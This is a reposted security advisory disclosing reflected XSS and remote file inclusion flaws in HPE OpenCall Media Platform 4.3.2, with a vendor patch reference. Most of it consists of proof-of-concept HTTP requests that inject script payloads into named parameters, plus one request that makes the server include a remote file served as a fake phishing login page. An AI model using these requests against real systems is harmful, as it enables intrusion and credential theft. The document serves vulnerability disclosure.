We ‘follow the sun’ and have two hubs, located in Palo Alto and
Amsterdam, to provide threat intelligence services, continuous support
and to operate local offices and partner network spanning 20+
countries around the globe.
Address USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301
Phone: 650.798.5255
Twitter: @erpscan
Scoop-it: Business Application Security
Source: https://blogs.securiteam.com/index.php/archives/3087
SSD Advisory – HPE OpenCall Media Platform (OCMP) Multiple Vulnerabilities
Want to get paid for a vulnerability similar to this one?
Contact us at: ssd@beyondsecurity.com
Vulnerabilities Summary
The following advisory describes Reflected Cross-Site Scripting (XSS)
vulnerabilities and a Remote File Inclusion vulnerability that when
combined can lead to Code Execution, were found in HP OpenCall Media
Platform (OCMP), version 4.3.2.
HPE OpenCall Media Platform (OCMP) is a suite of software and hardware
applications which allow implementation of common telecom operator
services such as voicemail, sms (short message service), prepaid,
billing, hlr, etc. It implements industry standard telecom protocols
and standards such as SS7, ISUP, TCAP, SIP, MRCP, RTSP, and VoiceXML.
HPE OpenCall Media Platform offers a highly scalable, easy-to-manage,
carrier-grade media platform that adapts to future networks and
applications. Through its strong support of open standards and
protocols, new applications can be rapidly developed and deployed in a
way that preserves investments and reduces capital expenditures
(CAPEX) and operational expenditure (OPEX).
There are 3 different components that are vulnerable in HPE OpenCall
Media Platform (OCMP), and for each component has the following
vulnerabilities:
Application Content Manager
Reflected Cross-Site Scripting (XSS) – /mcm/resources/
Platform Administration Tool
Reflected Cross-Site Scripting (XSS) that lead to Remote Code Execution
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE0 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE1 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE2 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_TYPE3 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME0 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME1 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME2 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NAME3 parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function
Reflected Cross-Site Scripting (XSS) – GetMapAction function, LEV_NUM parameter
Reflected Cross-Site Scripting (XSS) – GetMapAction function, NAME parameter
Reflected Cross-Site Scripting (XSS) – cdrdispatch function, next parameter
Reflected Cross-Site Scripting (XSS) – cdrdispatch function, sessionType parameter
VoiceXML Administration Tool
Reflected Cross-Site Scripting (XSS) – event.do function
Reflected Cross-Site Scripting (XSS) – call.do function
Remote File Inclusion – proxylink.do function
Credit
An independent security researcher Paolo Stagno from VoidSec has
reported this vulnerability to Beyond Security’s SecuriTeam Secure
Disclosure program.
Vendor Responses
HPE has released patches to address this vulnerability, for more details see:
https://h20564.www2.hpe.com/hpsc/doc/public/display?docId=emr_na-hpesbgn03686en_us
Vulnerabilities Details
Application Content Manager – /mcm/resources/
HPE OpenCall Media Platform (OCMP) does not sanitize /mcm/resources/
“description” and “prototype” parameters input. An attacker can inject
malicious Java script to trigger the Reflected Cross-Site Scripting
(XSS).
Proof of Concept
An Attacker send the following POST request to the victims machine :
POST https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?followindirection=false
HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/mcm+json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html
Content-Length: 54
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{ "": "", "description": "<script>alert(1);</script>"}
The server will respond with:
HTTP/1.1 204 No Content
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server
Then the attacker will send the second request to trigger the
Cross-Site Scripting (XSS):
GET https://127.0.0.1:8443/mcm/resources/dummy_test/dummy/test?format=json&followindirection=false&ms=1443024815924
HTTP/1.1
Host: 127.0.0.1:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
X-Requested-With: XMLHttpRequest
Referer: https://127.0.0.1:8443/mcm/tenant/mcmcontent.html
Connection: keep-alive
The server will respond with:
HTTP/1.1 200 OK
X-Powered-By: Servlet 2.5; JBoss-5.0/JBossWeb-2.1
Cache-control: no-cache
Content-Type: application/json
Transfer-Encoding: chunked
Date: Wed, 23 Sep 2015 16:13:35 GMT
Server: Web Server
VoiceXML Administration Tool – call.do function
HPE OpenCall Media Platform (OCMP) does not sanitize call.do function
parameters input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/call.do?action=list_calls&type=XSS_HERE
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /om/call.do?action=list_calls&type=Active637a3<script>alert(1)<%2fscript>c7e9f
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://127.0.0.1:5443/om/servicegroup.do?action=addservicegroup
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 127.0.0.1:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B
The server will respond with:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache,no-store
Expires: Thu, 01 Jan 1970 01:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 10 Sep 2015 13:30:41 GMT
Content-Length: 10418
<HTML>
<HEAD>
<TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE>
<LINK REL="stylesheet"
HREF="consolepages/templates/stylesheets/style.css" TYPE="text/css">
</HEAD>
<BODY>
<script type="text/javascript">
//HV Menu v5- by Ger Versluis (www.burmees.nl)
//Submitted to Dynamic Drive (www.dynamicdrive.com)
//Visit www.dynamicdrive.com for this script and more
function Go(){return}
</script>
<script type="text/javascript"
src="consolepages/templates/js/exmplmenu_var.jsp"></script>
<script type="text/javascript"
src="consolepages/templates/js/menu_com.js"></script>
<noscript>Your browser does not support script</noscript>
<TABLE WIDTH="800" BORDER="0">
<TR>
<TD><IMG SRC="consolepages/templates/images/speechweb.gif"/></TD>
</TR>
<TR>
<TD VALIGN="top">
Logged on as: zerpsta1 <SPAN id="warn">
</SPAN>
<BR><BR><BR><BR>
<br>
<b>Call Management -> Active637a3<script>alert(1)</script>c7e9f Calls</b>
<br><br><br>
<table border="1" width="1000">
<tr><td colspan="12" class="tableheader">Calls <a href="#"><img
src="consolepages/templates/images/questionmark.gif" border="0"
onClick="window.open('help.do?prompt=p20', 'help',
'toolbar=no,width=400,height=400,resizable=no,scrollbars=yes');"></a></td></tr>
<tr><td colspan="12"> </td></tr>
<tr>
<td><b><a href=call.do?action=sort_calls&type=node>Server Id</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=callid>CallId</a></b></td>
<td><b>CDR</b></td>
<td><b>Call Monitoring</b></td>
<td><b>Service Id</b></td>
<td><b><a href=call.do?action=sort_calls&type=ruri>Remote-URI</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=luri>Local-URI</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=severe>Severes</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=warning>Warnings</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=vxml_exception>VoiceXML
Exceptions</a></b></td>
<td><b><a href=call.do?action=sort_calls&type=time>Started At</a></b></td>
<td><b>Duration</b></td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_3</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_3%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_3&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470521123</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_3&type=vxml_exception
target="new">21</a></td>
<td>150909 19:00:52.429</td><td>00:00:00.502</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_2</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_2&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470174023</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_2&type=vxml_exception
target="new">21</a></td>
<td>150908 19:29:05.236</td><td>00:00:00.501</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_2</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_2%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_2&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470852423</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_2&type=vxml_exception
target="new">21</a></td>
<td>150908 19:27:56.237</td><td>00:00:01.003</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_1</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_1&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470632723</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_1&type=vxml_exception
target="new">21</a></td>
<td>150907 18:57:21.548</td><td>00:00:01.004</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp1</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_1</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp1%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_1%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_1&node=tb0ocmp1">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470277023</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_1&type=vxml_exception
target="new">21</a></td>
<td>150907 15:13:19.660</td><td>00:00:01.003</td>
</tr>
<tr>
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_40_420_0</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_40_420_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_40_420_0&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_0xxx">o2_ivr_0xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1542000470860823</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=ERROR
target="new">1</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_40_420_0&type=vxml_exception
target="new">21</a></td>
<td>150907 15:12:15.254</td><td>00:00:00.501</td>
</tr>
<tr bgcolor="eeeeee">
<td>tb0ocmp0</td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Flogs%2Fcallids%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13&contenttype=text/html"
target="_new">vxi_dialog_0_32_634_0</a></td>
<td><a href="proxylink.do?url=https%3A%2F%2Ftb0ocmp0%3A5443%2Fmit%2Fsystem%2Fcdr%2Fvxi_dialog_0_32_634_0%3FmultinodeUser%3Docadmin%26clusterID%3D7A2C87ED7D79EE7644287C3B4151FB13"
target="_new">CDR</a></td>
<td><a href="call.do?action=monitor&cid=vxi_dialog_0_32_634_0&node=tb0ocmp0">Monitor</a></td>
<td><a href="service.do?action=update&id=o2_ivr_3xxx">o2_ivr_3xxx</a></td>
<td>sip:unavailable@unknown.invalid</td>
<td>+1540003000009388</td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=ERROR
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=WARN
target="new">0</a></td>
<td><a href=event.do?action=list&callid=vxi_dialog_0_32_634_0&type=vxml_exception
target="new">0</a></td>
<td>150907 15:00:13.901</td><td>00:00:45.194</td>
</tr>
</table>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
VoiceXML Administration Tool – event.do function
HPE OpenCall Media Platform (OCMP) does not sanitize event.do function
parameters input. An attacker can inject malicious Java script to
trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL: /om/event.do?action=list&type=XSS_HERE
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /om/event.do?action=list&type=Active637a3<script>alert(1)<%2fscript>c7e9f
HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://172.27.116.32:5443/om/call.do?action=trace_calls&type=trace_calls
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 172.27.116.32:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5F9196107A3454133D4190CDB086E03B
The server will respond with:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2437
Date: Thu, 10 Sep 2015 13:32:55 GMT
<HTML>
<HEAD>
<TITLE>VoiceXML Environment Operation and Maintenance on tb0ocmp0</TITLE>
<LINK REL="stylesheet"
HREF="consolepages/templates/stylesheets/style.css" TYPE="text/css">
</HEAD>
<BODY>
<script type="text/javascript">
//HV Menu v5- by Ger Versluis (www.burmees.nl)
//Submitted to Dynamic Drive (www.dynamicdrive.com)
//Visit www.dynamicdrive.com for this script and more
function Go(){return}
</script>
<script type="text/javascript"
src="consolepages/templates/js/exmplmenu_var.jsp"></script>
<script type="text/javascript"
src="consolepages/templates/js/menu_com.js"></script>
<noscript>Your browser does not support script</noscript>
<TABLE WIDTH="800" BORDER="0">
<TR>
<TD><IMG SRC="consolepages/templates/images/speechweb.gif"/></TD>
</TR>
<TR>
<TD VALIGN="top">
Logged on as: zerpsta1 <SPAN id="warn">
</SPAN>
<BR><BR><BR><BR>
<script language="JavaScript">
function toggleVisibility( divId, buttonId ) {
if( document.all[divId].style.display == 'none' ) {
document.all[divId].style.display = 'inline';
document.all[buttonId].value = 'Hide Stacktrace';
} else {
document.all[divId].style.display = 'none';
document.all[buttonId].value = 'Show Stacktrace';
}
}
</script>
<br>
<b>Active637a3<script>alert(1)</script>c7e9f</b>
<br><br>
<form action="event.do">
<input type="submit" value="Reset" name="submit" onClick="return
confirm('Are you sure you want to remove all
Active637a3<script>alert(1)</script>c7e9f?')">
<input type="hidden" name="action" value=reset >
<input type="hidden" name="type"
value="Active637a3<script>alert(1)</script>c7e9f">
</form>
<br><br>
<table border="1" width="1200">
<tr><td colspan="8" class="tableheader">Events <a href="#"><img
src="consolepages/templates/images/questionmark.gif" border="0"
onClick="window.open('help.do?prompt=p21', 'help',
'toolbar=no,width=400,height=400,resizable=no,scrollbars=yes');"></a></td></tr>
<tr><td colspan="8"> </td></tr>
<tr>
<td><b><a href=event.do?action=sort&type=NODE >Server Id</a></b></td>
<td><b><a href=event.do?action=sort&type=TIME >Date</a></b></td>
<td><b><a href=event.do?action=sort&type=CALL >CallId</a></b></td>
<td><b>CDR</b></td>
<td><b>Service Id</b></td>
<td><b>Message</b></td>
</tr>
<tr><td colspan="8"> </td></tr>
<tr><td colspan="8">No Items Found</td></tr>
</TD>
</TR>
</TABLE>
</BODY>
</HTML>
VoiceXML Administration Tool – proxylink.do function
HPE OpenCall Media Platform (OCMP) does not sanitize proxylink.do
function parameters input. An attacker can inject malicious URL to
including remote files. After the attacker include the file, the HPE
OpenCall Media Platform will parse and execute the content of the
file.
The vulnerable URL: /om/proxylink.do?url=Remote File Inclusion Here (RFI)
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /om/proxylink.do?url=http://172.27.120.220:9595/fruuuuk.txt HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-GB
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 172.27.116.32:5443
DNT: 1
Connection: Keep-Alive
Cookie: JSESSIONID=5D8C311BBE2784FB2CE6DB970878D3CA
The server will respond with:
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 2565
Date: Wed, 09 Sep 2015 13:00:53 GMT
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>PHISHING LOGIN PAGE</title>
<meta http-equiv="Content-Type" content="text/html; charset=US-ASCII">
<link rel="Shortcut Icon" href="/login/images/hp.ico">
<script>
function onLoginFornLoad() {
document.getElementById("txtUsername").focus();
}
</script>
<style type="text/css">
.style1
{
width: 290px;
}
.style2
{
width: 285px;
}
</style>
</head>
<body onload="onLoginFornLoad()">
<h2>PHISHING LOGIN PAGE</h2>
<script>document.write("I`m also running JS");</script>
<form action="j_security_check" method="POST">
<table cellpadding="0" cellspacing="0" width="100%" height="100%"
style="background-color: #ffffff">
<tr>
<td align="center" valign="middle">
<table cellpadding="0" cellspacing="0" height="309"
style="border: 1px solid #000000; background-position:
left top; background-image:url('/login/images/hp_logo.png');
background-repeat: no-repeat; width: 576px; clip: rect(1px, auto,
auto, auto);" >
<tr>
<td class="style2"> </td>
<td class="style1">
<table cellpadding="0" cellspacing="0">
<tr>
<td width="60"
style="font-family: Arial, Helvetica,
sans-serif; color: #000000; font-weight: bold">
User Name </td>
<td><input name="j_username" type="text" size="14"
style="width: 193px;"
id="txtUsername" value=""></td>
</tr>
<tr><td colspan="2" height="3"></td></tr>
<tr>
<td style="font-family: Arial, Helvetica,
sans-serif; font-weight: bold">Password </td>
<td><input name="j_password" type="password"
size="14" style="width: 191px"></td>
</tr>
<tr><td colspan="2" height="3"></td></tr>
<tr><td colspan="2"> </td></tr>
<td colspan="2" align="right">
<button type="submit" value="Log in"
style="width:54px; margin-top:8px">Login</button>
</td>
</tr>
</table>
</td>
<td style="background-color: #FFFFFF"> </td>
</tr>
</table>
</td>
</tr>
</table>
</form>
</body>
</html>
Platform Administration Tool – Reflected Cross-Site Scripting (XSS)
that lead to Remote Code Execution
HPE OpenCall Media Platform (OCMP) does not sanitize cdrdispatch
function with parameter cmd=DisplayBaseCdrBrowsePage. An attacker can
inject malicious Java script to trigger the Cross-Site Scripting
(XSS).
Proof of Concept
An Attacker send the following GET request to the victims machine:
GET /OCMPOAM/cdrdispatch?cmd=DisplayBaseCdrBrowsePagef5df3<script>alert(1)<%2fscript>1d8b4&sessionType=NONE
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFMonitorMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE0 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE0 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985″><script>alert(1)<
%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T021985"><script>alert(1)<%2fscript>0ca30&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE1 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE1 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a”><script>alert(1)<
%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T14527a"><script>alert(1)<%2fscript>2d848&LEV_TYPE2=T2&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE2 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE2 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2″><script>alert(1)<
%2fscript>54f45&LEV_TYPE3=T3
Proof of Concept
An Attacker send the following GET request to the victims machine :
GET /OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2522b2"><script>alert(1)<%2fscript>54f45&LEV_TYPE3=T3
HTTP/1.1
Host: 172.27.116.40:4443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0)
Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://172.27.116.40:4443/OCMPOAM/BMPFFaultMgr.chailet
Cookie: JSESSIONID=4F99C27525BFDB44D46E3A109FA49DAC
Connection: keep-alive
Platform Administration Tool – LEV_TYPE3 parameter
HPE OpenCall Media Platform (OCMP) does not sanitize GetMapAction
function parameter LEV_TYPE3 input. An attacker can inject malicious
Java script to trigger the Reflected Cross-Site Scripting (XSS).
The vulnerable URL:
/OCMPOAM/BMPFFaultMgr.chailet?GetMapAction=HTML&LEVEL=TOP_LEVEL&TYPE=1&NAME=Root&DATE=0&LEV_NUM=0&LEV_NAME0=N0&LEV_NAME1=N1&LEV_NAME2=N2&LEV_NAME3=N3&LEV_TYPE0=T0&LEV_TYPE1=T1&LEV_TYPE2=T2&LEV_TYPE3=T3ecc32″><script>alert(1)<
%2fscript>54a0f
